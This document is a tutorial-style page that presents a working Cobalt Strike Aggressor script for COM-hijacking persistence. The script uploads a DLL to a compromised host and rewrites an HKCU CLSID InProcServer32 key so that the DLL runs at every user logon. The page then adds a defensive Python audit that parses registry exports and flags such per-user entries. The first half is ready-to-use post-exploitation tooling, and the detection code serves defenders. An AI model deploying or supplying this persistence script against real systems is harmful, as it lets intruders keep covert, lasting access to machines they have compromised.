# Writing a COM Hijacking Script

A simple Cobalt Strike Aggressor script that achieves persistence through COM hijacking.

```
sub Show_COM_GUI {
    $bid = $1;
    $dialog = dialog("COM hijack: user logon", %(),
    lambda({
        # upload the local DLL and move it to the chosen path on the target
        bupload($bid, $3['file']);
        bmv($bid, $3['DLL_NAME'], $3['DLL_PATH']);
        # recreate the CLSID key under HKCU (the per-user entry takes precedence over HKLM)
        bpowerpick($bid, 'Remove-Item "HKCU:\Software\Classes\CLSID\{0358B920-0AC7-461F-98F4-58E32CD89148}" -Recurse');
        bpowerpick($bid, 'New-Item -Type Directory "HKCU:\Software\Classes\CLSID\{0358B920-0AC7-461F-98F4-58E32CD89148}"');
        #brun($bid, "reg add \"HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\InProcServer32\" /t REG_SZ /d \"" . $3['DLL_PATH'] . $3['DLL_NAME'] . "\" /f");
        # point the InProcServer32 default value at the uploaded DLL and set its threading model
        bpowerpick($bid, "New-Item -itemType String 'HKCU:\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\InProcServer32' -Value \"" . $3['DLL_PATH'] . $3['DLL_NAME'] . "\"");
        bpowerpick($bid, 'Set-ItemProperty "HKCU:\Software\Classes\CLSID\{0358B920-0AC7-461F-98F4-58E32CD89148}\InProcServer32" -name ThreadingModel -value Both');
    }));
    dialog_description($dialog, "Hijacks the logon of any user; the DLL is triggered whenever any user logs on. Use an x64 DLL on x64 and an x86 DLL on x86. To remove the hijack: Remove-Item \"HKCU:\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\\" -Recurse");
    drow_file($dialog, "file", "Local DLL path: ");
    drow_text($dialog, "DLL_NAME", "DLL file name: ");
    drow_text($dialog, "DLL_PATH", "Upload path + DLL file name: ");
    dbutton_action($dialog, "Go");
    dialog_show($dialog);
}

popup beacon_bottom {
    item "&COM Persistence" {
        local('$bid');
        foreach $bid ($1) {
            Show_COM_GUI($bid);
        }
    }
}
```

Persistence is achieved by hijacking a COM object that is loaded at any user's logon: each time a user logs on, the DLL is triggered. Use a 32-bit DLL on 32-bit systems and a 64-bit DLL on 64-bit systems.
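The registry change this script makes (a per-user `InProcServer32` entry under `HKCU\Software\Classes\CLSID`) is also what a defender looks for when hunting this persistence. The following Python audit is an added example, not part of the original script or the Cobalt Strike project: it parses text in the format produced by `reg export HKCU\Software\Classes\CLSID`, collects every CLSID that carries an `InProcServer32` value in the user hive, and flags those whose DLL lives in a user-writable location. The registry dump, the `update.dll` path and the second CLSID are constructed sample data; the first CLSID is the one used by the script above.

```python
import re
from typing import Dict, List

# Constructed sample modelled on `reg export` output (values are REG_SZ with escaped backslashes).
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\CLSID\{0358B920-0AC7-461F-98F4-58E32CD89148}]

[HKEY_CURRENT_USER\Software\Classes\CLSID\{0358B920-0AC7-461F-98F4-58E32CD89148}\InProcServer32]
@="C:\\Users\\alice\\AppData\\Local\\Temp\\update.dll"
"ThreadingModel"="Both"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InProcServer32]
@="C:\\Program Files\\Vendor\\vendor.dll"
"ThreadingModel"="Apartment"
"""

# Section header of an InProcServer32 key under the per-user CLSID hive.
KEY_RE = re.compile(
    r"^\[(HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\(\{[0-9A-Fa-f-]{36}\})\\InProcServer32)\]$",
    re.IGNORECASE,
)
# `@="..."` is the default value; `"Name"="..."` is a named REG_SZ value.
VALUE_RE = re.compile(r'^(@|"([^"]+)")="(.*)"$')

# Directory fragments a standard user can normally write to (heuristic, lower-cased).
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\", "\\downloads\\")


def parse_inproc_servers(reg_text: str) -> Dict[str, dict]:
    """Map each HKCU CLSID with an InProcServer32 key to its DLL path and threading model."""
    found: Dict[str, dict] = {}
    current = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = KEY_RE.match(line)
        if m:
            current = m.group(2).upper()
            found[current] = {"key": m.group(1), "dll": None, "threading_model": None}
            continue
        if line.startswith("["):          # some other key: stop attributing values
            current = None
            continue
        if current is None:
            continue
        v = VALUE_RE.match(line)
        if not v:
            continue
        name = "(Default)" if v.group(1) == "@" else v.group(2)
        data = v.group(3).replace("\\\\", "\\")   # undo reg-export escaping
        if name == "(Default)":
            found[current]["dll"] = data
        elif name.lower() == "threadingmodel":
            found[current]["threading_model"] = data
    return found


def audit(reg_text: str) -> List[dict]:
    """Return one finding per HKCU InProcServer32 entry; user-writable DLL paths are the high-signal ones."""
    findings = []
    for clsid, info in parse_inproc_servers(reg_text).items():
        dll = info["dll"] or ""
        writable = any(tok in dll.lower() for tok in USER_WRITABLE)
        findings.append({
            "clsid": clsid,
            "dll": dll,
            "threading_model": info["threading_model"],
            "user_writable": writable,
            # Any HKCU InProcServer32 entry shadows the machine-wide one; a DLL in a
            # user-writable directory is the classic COM-hijack persistence pattern.
            "severity": "high" if writable else "review",
        })
    return sorted(findings, key=lambda f: (f["severity"] != "high", f["clsid"]))


if __name__ == "__main__":
    for f in audit(SAMPLE_REG_EXPORT):
        print(f"[{f['severity']:6}] {f['clsid']} -> {f['dll']} (ThreadingModel={f['threading_model']})")
```

On a live host, feed the script the output of `reg export "HKCU\Software\Classes\CLSID" clsid.reg` and compare any flagged CLSID against its `HKLM\Software\Classes\CLSID` counterpart; an HKCU entry that points to a different DLL than the machine-wide key is the thing to investigate, and removing the per-user key (as the script's own description notes) restores the original server.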

